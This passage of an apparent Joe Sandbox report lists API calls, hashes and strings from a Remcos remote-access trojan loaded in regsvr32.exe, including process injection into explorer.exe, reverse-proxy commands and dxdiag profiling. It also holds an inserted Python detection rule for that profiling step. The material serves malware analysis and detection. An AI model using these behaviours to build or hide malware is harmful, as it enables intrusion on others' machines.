                                      • Instruction Fuzzy Hash: 92414A32D901186ADB15FBA0EDD4DFEB77ABF54710F40006BA10AA70E5EF205E4ACE90
                                      APIs
                                      • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 02A0DB9A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                      • API String ID: 82841172-425784914
                                      • Opcode ID: daf9fc275ee9ba27768cc758312b8688391245f6f998ba9bf1bd1ee44f90d4cc
                                      • Instruction ID: 40bd6c728db13f355361326fbacd023cf8b82b441b76e18b4877bf9f9a2641d1
                                      • Opcode Fuzzy Hash: daf9fc275ee9ba27768cc758312b8688391245f6f998ba9bf1bd1ee44f90d4cc
                                      • Instruction Fuzzy Hash: 35412F72188200AAE215FB60FED5CBEB7EAFE91755F00051FB546920E0EF609E49CA52
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02A01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02A3A892
                                      • GetLastError.KERNEL32(?,?,02A01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02A3A89F
                                      • __dosmaperr.LIBCMT ref: 02A3A8A6
                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02A01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02A3A8D2
                                      • GetLastError.KERNEL32(?,?,?,02A01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02A3A8DC
                                      • __dosmaperr.LIBCMT ref: 02A3A8E3
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,02A01D55,?), ref: 02A3A926
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,02A01D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02A3A930
                                      • __dosmaperr.LIBCMT ref: 02A3A937
                                      • _free.LIBCMT ref: 02A3A943
                                      • _free.LIBCMT ref: 02A3A94A
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                      • String ID:
                                      • API String ID: 2441525078-0
                                      • Opcode ID: 6bda4f4f8e7df6e1ea32e3e9b0a97ad9dd2526c0a64e295d2ae306c83fff5d91
                                      • Instruction ID: 07c80c5bcb149cfee7d26739f165f9a92c1d8fdbf4ce60c8fec103423f74109c
                                      • Opcode Fuzzy Hash: 6bda4f4f8e7df6e1ea32e3e9b0a97ad9dd2526c0a64e295d2ae306c83fff5d91
                                      • Instruction Fuzzy Hash: EF31AE7280422AEBDF12AFA4CC84DAF7B6DEF45364F104258F9606A191DF31C952DBA0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 0$1$2$3$4$5$6$7
                                      • API String ID: 0-3177665633
                                      • Opcode ID: b066abff0cc2798351d8fb7f03b8c93088491d65de77dbea051688a2f2a8ef93
                                      • Instruction ID: 52157ba64f86feaef6ccc9c6135c23c0a292e4bdb421fc51b2279a2e483f4e7a
                                      • Opcode Fuzzy Hash: b066abff0cc2798351d8fb7f03b8c93088491d65de77dbea051688a2f2a8ef93
                                      • Instruction Fuzzy Hash: 21719F709883029FD304EF21E8A0BAB7BA5AF85320F44491DF5A2571D0DF74AA4CCF92
                                      APIs
                                      • SetEvent.KERNEL32(?,?), ref: 02A054BF
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02A0556F
                                      • TranslateMessage.USER32(?), ref: 02A0557E
                                      • DispatchMessageA.USER32(?), ref: 02A05589
                                      • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,02A74F78), ref: 02A05641
                                      • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 02A05679
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                      • String ID: CloseChat$DisplayMessage$GetMessage
                                      • API String ID: 2956720200-749203953
                                      • Opcode ID: 14f5d239cb4a06e1f6303138e6e2e2d70a9cfa211a07de34d24569b380520385
                                      • Instruction ID: 93969cf134cd66ae9ca5a19f7629164e76029c7225d6771a24745f616da509b2
                                      • Opcode Fuzzy Hash: 14f5d239cb4a06e1f6303138e6e2e2d70a9cfa211a07de34d24569b380520385
                                      • Instruction Fuzzy Hash: 4541C531A84301ABDB14FB74EDD89AF77AAAB85710F80091DE916875C0DF34D916CF91
                                      APIs
                                      • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 02A13417
                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 02A13425
                                      • GetFileSize.KERNEL32(?,00000000), ref: 02A13432
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 02A13452
                                      • CloseHandle.KERNEL32(00000000), ref: 02A1345F
                                      • CloseHandle.KERNEL32(?), ref: 02A13465
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                      • String ID:
                                      • API String ID: 297527592-0
                                      • Opcode ID: fe930d3febd67c1734bcb2b60e53fa130be3cf196d4e12960d90016ad14658c1
                                      • Instruction ID: e43a7df0f0980aeac5e78c2d23e52d9f6002ccc721f4d87b83143da42826304b
                                      • Opcode Fuzzy Hash: fe930d3febd67c1734bcb2b60e53fa130be3cf196d4e12960d90016ad14658c1
                                      • Instruction Fuzzy Hash: 1A41F131688301BBDB119F25EC89F6B7BADEFC4768F100999F644DA090DF30C405CA6A
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,02A1A486,00000000), ref: 02A1AB1C
                                      • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,02A1A486,00000000), ref: 02A1AB33
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A486,00000000), ref: 02A1AB40
                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,02A1A486,00000000), ref: 02A1AB4F
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A486,00000000), ref: 02A1AB60
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A486,00000000), ref: 02A1AB63
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 58a09e55e88c9a02a69c07207930b68c7488d44ed47fb629162ee4c1b7647600
                                      • Instruction ID: 6f95896d826bc987db266f8410f1538450f9a0817fb68b63e3603817d9239bbd
                                      • Opcode Fuzzy Hash: 58a09e55e88c9a02a69c07207930b68c7488d44ed47fb629162ee4c1b7647600
                                      • Instruction Fuzzy Hash: 3211CE71D8122AAB9721AB64ECC8DFF3B7DDF42361B000816FA0996041DF648D06EAE1
                                      APIs
                                      • _free.LIBCMT ref: 02A48135
                                        • Part of subcall function 02A46782: HeapFree.KERNEL32(00000000,00000000,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?), ref: 02A46798
                                        • Part of subcall function 02A46782: GetLastError.KERNEL32(?,?,02A50C6F,?,00000000,?,00000000,?,02A50F13,?,00000007,?,?,02A5145E,?,?), ref: 02A467AA
                                      • _free.LIBCMT ref: 02A48141
                                      • _free.LIBCMT ref: 02A4814C
                                      • _free.LIBCMT ref: 02A48157
                                      • _free.LIBCMT ref: 02A48162
                                      • _free.LIBCMT ref: 02A4816D
                                      • _free.LIBCMT ref: 02A48178
                                      • _free.LIBCMT ref: 02A48183
                                      • _free.LIBCMT ref: 02A4818E
                                      • _free.LIBCMT ref: 02A4819C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 3349c83891f388ffee49df301a5ffca5e1db98efece87d43e34d83ac19a9e44d
                                      • Instruction ID: 69d43a46447f82b85024772e5669d7605e5cbd7b97028d5dcc032ed0be98702f
                                      • Opcode Fuzzy Hash: 3349c83891f388ffee49df301a5ffca5e1db98efece87d43e34d83ac19a9e44d
                                      • Instruction Fuzzy Hash: E011A27A540108EFCB01EF94CA80CD93BAAFF85755B4541A5BA588F221DE32EF509FC0
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 02A19FB9
                                      • GdiplusStartup.GDIPLUS(02A74ACC,?,00000000), ref: 02A19FEB
                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 02A1A077
                                      • Sleep.KERNEL32(000003E8), ref: 02A1A0FD
                                      • GetLocalTime.KERNEL32(?), ref: 02A1A105
                                      • Sleep.KERNEL32(00000000,00000018,00000000), ref: 02A1A1F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                      • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                      • API String ID: 489098229-3790400642
                                      • Opcode ID: bddc486ac2bbe7d33c40ca48356c2628ca49c0b796a1412bd8ad597ca66976dc
                                      • Instruction ID: 05ab43e1e9e85fcf26bac60807cb072a6b1e15ebdf346af787d1b7b6d0b6f262
                                      • Opcode Fuzzy Hash: bddc486ac2bbe7d33c40ca48356c2628ca49c0b796a1412bd8ad597ca66976dc
                                      • Instruction Fuzzy Hash: A0518071E802159ADB14FBB4ED94AFEBBBAAF44310F40001AE509AB1C1EF749D49CF50
                                      APIs
                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,02A56FFF), ref: 02A55F27
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DecodePointer
                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                      • API String ID: 3527080286-3064271455
                                      • Opcode ID: 32b6d1693496f20daceb825b2b9e8e6e300ff6669a41dbfd6b8a242d073fc30c
                                      • Instruction ID: b8588c7f37974d90eaa544dc58c7e504c41f50ff1e676e7fe5a1b93f228a9f7a
                                      • Opcode Fuzzy Hash: 32b6d1693496f20daceb825b2b9e8e6e300ff6669a41dbfd6b8a242d073fc30c
                                      • Instruction Fuzzy Hash: AB51617090052ACBCF14DF68EA8C5BEBBB8FF49714F948185D841A7254CF319968CB19
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 02A174F5
                                        • Part of subcall function 02A1C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,02A0412F,02A65E74), ref: 02A1C49E
                                      • Sleep.KERNEL32(00000064), ref: 02A17521
                                      • DeleteFileW.KERNEL32(00000000), ref: 02A17555
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CreateDeleteExecuteShellSleep
                                      • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                      • API String ID: 1462127192-2001430897
                                      • Opcode ID: 8855a23e6480e19e7e4f28d5032c8851f53ccd0cdaf1ad968f2d38115df47ef6
                                      • Instruction ID: dcfd28afa80f314bcdb5d54323a31413f12fbf5da5baf89d53badb547464fc82
                                      • Opcode Fuzzy Hash: 8855a23e6480e19e7e4f28d5032c8851f53ccd0cdaf1ad968f2d38115df47ef6
                                      • Instruction Fuzzy Hash: 63317471980219AADB04FBA0FED5DFEB77AAF14314F40055AD50A670D0EF605E8ACE94
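The record above is host-observable as a process tree plus a short file lifetime: ShellExecuteW launches dxdiag with `/t` and a `\sysinfo.txt` path under the temp directory, the code sleeps (Sleep(0x64), 100 ms), then DeleteFileW removes the report. As an added example (not part of the report and not Joe Sandbox code), the Python below correlates constructed Sysmon-style ProcessCreate and FileDelete events to flag that sequence. The event values, the LOLBIN_PARENTS set (regsvr32.exe and rundll32.exe as likely hosts of a DLL payload) and the 30-second DELETE_WINDOW are assumptions of the example, not facts from the report.

```python
r"""Correlate constructed Sysmon-style events to flag the profiling sequence in the record
above: a regsvr32-hosted DLL runs `dxdiag /t <temp>\sysinfo.txt`, sleeps, then deletes the
report. Added example; the events are made up, not taken from the sandbox run."""
from datetime import datetime, timedelta

# Field names follow Sysmon EventID 1 (ProcessCreate) and 23 (FileDelete); values are constructed.
EVENTS = [
    {"t": "2024-10-17T10:00:00", "id": 1, "pid": 4120, "ppid": 3980,
     "Image": r"C:\Windows\SysWOW64\dxdiag.exe",
     "ParentImage": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r"dxdiag /t C:\Users\u\AppData\Local\Temp\sysinfo.txt"},
    {"t": "2024-10-17T10:00:03", "id": 23, "pid": 3980,
     "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "TargetFilename": r"C:\Users\u\AppData\Local\Temp\sysinfo.txt"},
    # Benign: a user runs the same command from Explorer and keeps the report.
    {"t": "2024-10-17T11:00:00", "id": 1, "pid": 5000, "ppid": 1200,
     "Image": r"C:\Windows\System32\dxdiag.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"dxdiag /t C:\Users\u\Desktop\sysinfo.txt"},
]

LOLBIN_PARENTS = {"regsvr32.exe", "rundll32.exe"}  # assumed hosts of a DLL payload like this one
DELETE_WINDOW = timedelta(seconds=30)              # the sample only sleeps 100 ms before DeleteFileW


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_dxdiag_report_launch(ev):
    """ProcessCreate of dxdiag.exe with /t, writing a report named sysinfo.txt."""
    if ev["id"] != 1 or _basename(ev["Image"]) != "dxdiag.exe":
        return False
    cmd = ev["CommandLine"].lower()
    return "/t" in cmd.split() and "sysinfo.txt" in cmd


def report_path(ev):
    """Path given to `dxdiag /t`, normalised for comparison with FileDelete events."""
    return ev["CommandLine"].lower().split("/t", 1)[1].strip().strip('"')


def find_dxdiag_recon(events):
    """Findings for dxdiag report launches from a LOLBin parent and/or whose report the
    parent process deletes within DELETE_WINDOW; launches with no reason are dropped."""
    findings = []
    for ev in filter(is_dxdiag_report_launch, events):
        t0, target, reasons = datetime.fromisoformat(ev["t"]), report_path(ev), []
        if _basename(ev["ParentImage"]) in LOLBIN_PARENTS:
            reasons.append("lolbin-parent")
        for other in events:
            if (other["id"] == 23 and other["pid"] == ev["ppid"]
                    and other["TargetFilename"].lower() == target
                    and timedelta(0) <= datetime.fromisoformat(other["t"]) - t0 <= DELETE_WINDOW):
                reasons.append("report-deleted-by-parent")
                break
        if reasons:
            findings.append({"pid": ev["pid"], "parent": ev["ParentImage"],
                             "report": target, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_dxdiag_recon(EVENTS):
        print(finding)
```

The parent check alone already separates the sandbox behaviour from an administrator running dxdiag by hand; the delete correlation is what keeps the rule useful when the payload is hosted by a process not in LOLBIN_PARENTS, since the report being removed seconds after creation by a different process is the part a user never does.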
                                      APIs
                                      • GetCurrentProcess.KERNEL32(02A72B14,00000000,02A752D8,00003000,00000004,00000000,00000001), ref: 02A073DD
                                      • GetCurrentProcess.KERNEL32(02A72B14,00000000,00008000,?,00000000,00000001,00000000,02A07656,C:\Windows\SysWOW64\regsvr32.exe), ref: 02A0749E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentProcess
                                      • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                      • API String ID: 2050909247-4242073005
                                      • Opcode ID: e43a2ec7d2316eb6177c83d014884c9e840b21bbfadac6076296bd1ab2b22047
                                      • Instruction ID: c5a452a2a11bc2a8bde4d36c79b541c77ced715c94a7fe7e8c054c68f424a7ad
                                      • Opcode Fuzzy Hash: e43a2ec7d2316eb6177c83d014884c9e840b21bbfadac6076296bd1ab2b22047
                                      • Instruction Fuzzy Hash: 6D317271E80301ABE321EF74ED89F66B7B9BB48701F100824FA1196681DF75E8198B65
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02A1D476
                                        • Part of subcall function 02A1D50F: RegisterClassExA.USER32(00000030), ref: 02A1D55B
                                        • Part of subcall function 02A1D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 02A1D576
                                        • Part of subcall function 02A1D50F: GetLastError.KERNEL32 ref: 02A1D580
                                      • ExtractIconA.SHELL32(00000000,?,00000000), ref: 02A1D4AD
                                      • lstrcpynA.KERNEL32(02A74B60,Remcos,00000080), ref: 02A1D4C7
                                      • Shell_NotifyIconA.SHELL32(00000000,02A74B48), ref: 02A1D4DD
                                      • TranslateMessage.USER32(?), ref: 02A1D4E9
                                      • DispatchMessageA.USER32(?), ref: 02A1D4F3
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02A1D500
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                      • String ID: Remcos
                                      • API String ID: 1970332568-165870891
                                      • Opcode ID: 16eda2cb3a677dd06f2450a3ccf50dff63ce363a690f761feba297735712cd2e
                                      • Instruction ID: 3e1b83ce368c1a897a91c3aab235659869e22c5e9eaf6fe9a43d033a561b2e89
                                      • Opcode Fuzzy Hash: 16eda2cb3a677dd06f2450a3ccf50dff63ce363a690f761feba297735712cd2e
                                      • Instruction Fuzzy Hash: E7012E75C80255EBE7109FA5EC4DF9BBB7CBB85714F004459F61187080DF78986ACB94
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 49f106b45ff2df0520e9fbad24bd9bd28b6f1d49faeb95ad473cd6d5fd7794a6
                                      • Instruction ID: 17a22a4d000b29e6738b65424966535063ee966ac251f79013cdd38cbf0d3216
                                      • Opcode Fuzzy Hash: 49f106b45ff2df0520e9fbad24bd9bd28b6f1d49faeb95ad473cd6d5fd7794a6
                                      • Instruction Fuzzy Hash: 23C1E370E44349AFCB11DFACC880BADBBB6AF89314F14455AE915AB281CF34D946CF61
                                      APIs
                                      • GetCPInfo.KERNEL32(?,?), ref: 02A53E2F
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 02A53EB2
                                      • __alloca_probe_16.LIBCMT ref: 02A53EEA
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02A53F45
                                      • __alloca_probe_16.LIBCMT ref: 02A53F94
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 02A53F5C
                                        • Part of subcall function 02A46137: RtlAllocateHeap.NTDLL(00000000,02A352BC,?,?,02A38847,?,?,00000000,02A76B50,?,02A0DE62,02A352BC,?,?,?,?), ref: 02A46169
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02A53FD8
                                      • __freea.LIBCMT ref: 02A54003
                                      • __freea.LIBCMT ref: 02A5400F
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                      • String ID:
                                      • API String ID: 201697637-0
                                      • Opcode ID: b0744691169e3dc8e13402d34dd8df1c5597df3873e116e0cabcbe2232cec2cb
                                      • Instruction ID: 41e8166980758fd0d5826e1c902679f5cab82b785bcc162637bb7f61be7f66b3
                                      • Opcode Fuzzy Hash: b0744691169e3dc8e13402d34dd8df1c5597df3873e116e0cabcbe2232cec2cb
                                      • Instruction Fuzzy Hash: AE919172E002269ADF209F65C881AEFBBF5AF89794F144599FC05EB180DF35D845CBA0
                                      APIs
                                        • Part of subcall function 02A48215: GetLastError.KERNEL32(?,02A3F720,02A3A7F5,02A3F720,02A74EF8,?,02A3CE15,FF8BC35D,02A74EF8,02A74EF8), ref: 02A48219
                                        • Part of subcall function 02A48215: _free.LIBCMT ref: 02A4824C
                                        • Part of subcall function 02A48215: SetLastError.KERNEL32(00000000,FF8BC35D,02A74EF8,02A74EF8), ref: 02A4828D
                                        • Part of subcall function 02A48215: _abort.LIBCMT ref: 02A48293
                                      • _memcmp.LIBVCRUNTIME ref: 02A45423
                                      • _free.LIBCMT ref: 02A45494
                                      • _free.LIBCMT ref: 02A454AD
                                      • _free.LIBCMT ref: 02A454DF
                                      • _free.LIBCMT ref: 02A454E8
                                      • _free.LIBCMT ref: 02A454F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorLast$_abort_memcmp
                                      • String ID: C
                                      • API String ID: 1679612858-1037565863
                                      • Opcode ID: 894ae7defd30c3ca7a13b2ac61a3d06dbc352b583f20a12899c7dde4a079eb5b
                                      • Instruction ID: 683ebe42589933c01395c5fb1958113b94e7ba1f4e266f92051446d0b5781766
                                      • Opcode Fuzzy Hash: 894ae7defd30c3ca7a13b2ac61a3d06dbc352b583f20a12899c7dde4a079eb5b
                                      • Instruction Fuzzy Hash: 87B12775E01219DBDB24DF18C884BADB7B5FB98704F9445AAD94AA7250EF30EE90CF40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: tcp$udp
                                      • API String ID: 0-3725065008
                                      • Opcode ID: 2bf291d2c3816cc1ba7f71bc1fc32a4c450f7a9cb83d46dfcb30e31ad486b03a
                                      • Instruction ID: 6cfda117094fa107a6bf1b035b501290c1e593c159647a5b29766f694ec5544c
                                      • Opcode Fuzzy Hash: 2bf291d2c3816cc1ba7f71bc1fc32a4c450f7a9cb83d46dfcb30e31ad486b03a
                                      • Instruction Fuzzy Hash: 187169746083429FDB24CF18C584B2ABBE5AF8C369F15482EE99587290EB74C944CB92
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Eventinet_ntoa
                                      • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                      • API String ID: 3578746661-168337528
                                      • Opcode ID: 6511f7b313402bd3914e5ce847da480495ff5058989c93ae5fa3210b166b275d
                                      • Instruction ID: f79263061d6ed4e1e1f366844b398c0cb10d0a8cad5d03f2dacd08d8fe83211b
                                      • Opcode Fuzzy Hash: 6511f7b313402bd3914e5ce847da480495ff5058989c93ae5fa3210b166b275d
                                      • Instruction Fuzzy Hash: 0351D331E843409BC614FB34DD98B7E77A7AB84364F40091AE90A876D0EF74C91ACF96
                                      APIs
                                        • Part of subcall function 02A17F2C: __EH_prolog.LIBCMT ref: 02A17F31
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,02A660A4), ref: 02A17DDC
                                      • CloseHandle.KERNEL32(00000000), ref: 02A17DE5
                                      • DeleteFileA.KERNEL32(00000000), ref: 02A17DF4
                                      • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 02A17DA8
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                      • String ID: <$@$Temp
                                      • API String ID: 1704390241-1032778388
                                      • Opcode ID: 88208347ea11d5cc9ea887c5016a7985fe6d0a83db0e517df31dc3f512af9fef
                                      • Instruction ID: f42f5f81d353c6a79101e12f8df6176ccdc155f33a689650cc8d131c0493a103
                                      • Opcode Fuzzy Hash: 88208347ea11d5cc9ea887c5016a7985fe6d0a83db0e517df31dc3f512af9fef
                                      • Instruction Fuzzy Hash: 2E419231D802099BDB14FB60EE99BFEB77AAF10310F404169E50A664D0EF741E9ACF91
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,02A74EE0,02A65FA4,?,00000000,02A07FFC,00000000), ref: 02A079C5
                                      • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,02A07FFC,00000000,?,?,0000000A,00000000), ref: 02A07A0D
                                        • Part of subcall function 02A04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02A04B36
                                      • CloseHandle.KERNEL32(00000000,?,00000000,02A07FFC,00000000,?,?,0000000A,00000000), ref: 02A07A4D
                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 02A07A6A
                                      • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 02A07A95
                                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 02A07AA5
                                        • Part of subcall function 02A04B96: WaitForSingleObject.KERNEL32(?,000000FF,00000000,02A74EF8,02A04C49,00000000,?,?,00000000,02A74EF8,02A04AC9), ref: 02A04BA5
